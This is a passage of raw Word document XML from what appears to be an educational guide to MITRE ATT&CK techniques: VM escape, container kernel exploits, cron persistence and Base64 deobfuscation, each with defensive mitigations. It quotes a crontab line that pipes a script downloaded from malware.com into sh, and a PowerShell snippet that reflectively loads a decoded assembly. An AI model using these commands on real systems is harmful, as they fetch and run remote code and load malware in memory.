      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries exploit software vulnerabilities (e.g., kernel flaws, misconfigured services) to elevate privileges. This often targets unpatched systems or over-permissioned services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00886717" w:rsidRDefault="00886717" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidR="00950FDC" w:rsidRPr="00886717">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00886717" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886717">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VM Escape via Hypervisor Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Exploit flaws in hypervisors (e.g., VMware ESXi) to break out of guest VMs and execute code on the host. This typically targets memory corruption bugs (e.g., CVE-2021-21974).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: ESXiArgs ransomware leveraged ESXi heap-overflow vulnerabilities to escape VMs, encrypt host storage, and disrupt entire cloud clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Compromise of all VMs on a hypervisor; data destruction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00886717" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886717">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kernel-Level Exploits in Containers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1210"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Abuse Linux kernel vulnerabilities (e.g., Dirty Pipe, CVE-2022-0847) in container environments to gain root on the host. Adversaries load malicious kernel modules or overwrite privileged files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1210"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: Hildegard used the BOtB tool to exploit cgroups misconfigurations, loading a kernel module that disabled host security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1210"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Persistent root access; evasion of container runtime defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Patch hypervisors/kernels immediately; disable unused VM features (e.g., OpenGL acceleration).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Use kernel hardening tools (e.g., SELinux, AppArmor) to restrict module loading.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00886717" w:rsidRDefault="00886717" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00886717" w:rsidRDefault="00886717" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00886717" w:rsidRDefault="00886717" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00886717" w:rsidRDefault="00886717" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3) Technique: Scheduled Task/Job → Cron (T1053.003)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886717">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Abuse Unix/Linux cron schedulers to execute malicious scripts at predefined intervals. Cron jobs run with the privileges of their owner, allowing adversaries to escalate via root-owned tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00886717" w:rsidRDefault="00950FDC" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886717">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00886717" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886717">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Persistence via User-Level Crontab Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries add malicious entries to a user’s crontab (e.g., */5 * * * * curl http://malware.com/payload.sh | sh). This executes payloads even after logout.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: CronRAT injected a cron job to download a reverse shell every hour, maintaining access in compromised cloud environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Long-term persistence; lateral movement via scheduled network scans.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00886717" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886717">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>System-Wide Cron Directory Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Place scripts in system cron directories (e.g., /etc/cron.hourly/) to run with root privileges. Adversaries often disguise scripts as benign (e.g., log_cleaner.sh).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: TeamTNT dropped a cryptocurrency miner in /etc/cron.daily/, ensuring daily execution and hiding among legitimate maintenance jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Root-level command execution; resource hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Audit cron jobs regularly: crontab -l (user) and grep -R "" /etc/cron* (system).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00701072" w:rsidRPr="00701072" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enforce least privilege: Run cron jobs as non-root users where possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00701072" w:rsidRDefault="00701072" w:rsidP="00701072">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00701072" w:rsidRPr="00886717" w:rsidRDefault="00701072" w:rsidP="00886717">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRPr="00A45289" w:rsidRDefault="00264887" w:rsidP="00A45289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Defense Evasion</w:t>
      </w:r>
      <w:r w:rsidR="00886717">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A45289" w:rsidRPr="00A45289">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45289" w:rsidRDefault="00A45289" w:rsidP="00A45289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45289">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45289">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Defense Evasion involves techniques adversaries use to avoid detection throughout their compromise. This includes disabling security tools, obfuscating malicious activity, masquerading as legitimate entities, and manipulating digital artifacts to evade analytical and forensic investigations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45289" w:rsidRDefault="00A45289" w:rsidP="00A45289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>1) Technique: Deobfuscate/Decode Files or Information (T1140)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries use obfuscation (scrambling code/data) to hide malicious payloads, then deobfuscate/decode them at runtime to execute attacks. This bypasses static security tools like signature-based antivirus that scan for known patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Base64 + XOR Decoding for Malware Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Malicious scripts (e.g., PowerShell, Python) are encoded with Base64 (text-to-binary) and XOR (bit-flipping) to appear as gibberish. At runtime, they self-decode into executable payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Emotet delivered Base64-encoded DLLs via phishing emails. Victims ran a PowerShell script to decode and load the DLL into memory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$data = [System.Convert]::FromBase64String("aGVqZG8...")</w:t>
      </w:r>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>[Reflection.Assembly]::Load($data).EntryPoint.Invoke($null, $null)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
